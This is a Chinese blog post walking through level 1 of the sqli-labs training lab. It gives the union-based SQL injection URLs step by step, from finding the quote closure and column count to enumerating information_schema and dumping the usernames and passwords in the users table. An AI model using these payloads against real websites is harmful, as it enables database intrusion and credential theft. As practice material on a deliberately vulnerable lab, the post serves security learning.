SQL labs靶场-SQL注入入门

已于 2024-08-06 22:22:35 修改
阅读量557 收藏 4
点赞数 4
分类专栏: sql注入 文章标签: sql 数据库
于 2024-07-22 22:09:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80280669/article/details/140619883
版权

靶场及环境配置参考

一,工具准备。

推荐下载火狐浏览器,并下载harkbar插件(v2)版本。hackbar使用教程在此不做过多描述。

补充:url栏内部信息会进行url编码。

二,SQL注入-less1。

1,判断传参方式。

先输入

http://192.168.61.206:8001/Less-1/?id=1 //查看是否有回显

有回显,说明是get类型的传参。

尝试其他参数,以确认漏洞存在。

http://192.168.61.206:8001/Less-1/?id=2

2,判断闭合符,闭合所输入的语句,以使得后续的SQL语句溢出,达到运行的目的。

得知,闭合符是单引号。

3,判断有几个字段。

order by:对结果集进行列排序。

在url栏输入:

http://192.168.61.206:8001/Less-1/?id=1'order by 3 --+ 
--+ //注释掉后续的的代码,以让输入的语句的得以执行。

order by 3 不报错。

order by 4 报错,说明此处只有三个字段。

4,查库名。

使用select和 datebase指令,在此处利用union联合查询以获取库名。

http://192.168.61.206:8001/Less-1/?id=-1' union select 1,database(),3 --+

union查询可以select多条语句并用(只能select)可以显示没有的东西。

union:两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的。

展示空间不够前面会覆盖后面内容,所以接下来用-1,让前面命令执行不成功,以显示后续的内容。

database()为查询库名。

得到数据库名。

5,查询数据库内的表名。

http://192.168.61.206:8001/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+

注意:MySQL自带的几个特殊库.

MySQL自带Information_schema库。

Information_schema库里有两个特殊的表。

表tables记录了库名和表名。

表columns:库里面有什么表,表里面有什么字段。

table_schema:记录了所有库的库名。

table_name.记录了表。

column_name:记录了字段。

6,多次重复此操作(需要改LIMIT),以获得所有表名。

http://192.168.61.206:8001/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='security' LIMIT 1,1 --+

LIMIT1,表示从第二行开始取,取一行。

7,得到字段名。

http://192.168.61.206:8001/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

8,得到敏感信息。

http://192.168.61.206:8001/Less-1/?id=-1' union select 1,2,group_concat(username , password) from users--+

三,总结。

sql注入为入门级的漏洞,现如今已经极为少见,但仍有其典型性。从此开始,便正式进入了黑客的大门。

影•逝
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3900
sqli靶场SqliLabs 是一个学习 SQL 注入的靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
sql注入靶场实操
m0_46104808的博客
10-27 1567
sql注入漏洞利用
【精选详细】sql-labs通关(SQL注入11-25)
weixin_67832625的博客
07-28 1157
sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4132
一次简单的SQL注入靶场练习
sql注入靶场_sql注入
weixin_26705651的博客
09-21 959
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
sql注入——pikachu靶场
cjh12340826的博客
07-20 649
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
SQL注入--靶场练习
wmr123456001的博客
02-11 2066
SQL注入靶场练习
SQL注入漏洞靶场-sqli-labs学习
weixin_46595570的博客
01-03 2869
less-1 判断注入点 根据提示在url中添加?id=1 ——注意此处输入的都是英文符号 当然2也可以,这里只是为了传递一个参数,从而输出一个登陆结果 我们知道了登陆成功的页面之后,现在就要尝试他对于一段代码的闭合方式的猜测(这里有“‘单引号”,“”双引号”,“)括号”,以及他们的组合方式) 现在我们尝试一下单引号,出现报错,说明可能与他有关 对于网址里面的%27,%20其实就是url的编码结果,就像是’对应%27,空格对应%20 然后...
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
最新发布
08-12
sqli-labs-master是一个SQL注入SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
修改数据库配置文件 sqli-labs/sql-connections/db-creds.inc,数据库会自动创建,只要配置好用户名、密码、主机地址就可以。改好以后保存。 知识点 5: 添加网站 打开 phpstudy,添加网站。这一步除了填写域名,...
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
新版KALI 部署 sql-labs-master (sql注入靶场)
weixin_42819368的博客
03-08 1852
在kali 上部署sql-labs : sql-labs 需要部署在 mysql+php+apache 的环境下 kali自带 mysql+php+apache 首先需要 启用mysql 与 apache服务 初始化mysql mysql_secure_installation 初始化 密码 及开启远程连接 下载 sql-labs https://github.com/Audi-1/sq...
sql注入靶场
weixin_44382333的博客
09-22 154
盲注: updatexml()函数的理解(图床的设置)
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5798
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
SQL注入(php靶场为例)
qq_47632786的博客
02-07 465
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
iwebsec靶场sql注入
果粒程
02-24 1050
iwebsec靶场sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值